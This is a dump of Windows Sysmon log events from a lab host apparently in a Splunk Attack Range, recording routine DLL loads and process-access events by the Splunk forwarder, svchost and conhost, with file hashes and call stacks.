Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 
734700x800000000000000098284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 23542300x800000000000000098282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C8A3844AED3DE4416A963FAE4645C5,SHA256=FE113B10130E4159E071F4CF70ABA40C906C6D98E10E29F4343EE4346B3A718D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program 
Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 
734700x800000000000000098274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.057{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 
734700x800000000000000098267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program 
Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft 
WindowsValid 734700x800000000000000098260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
734700x800000000000000098253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000098249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
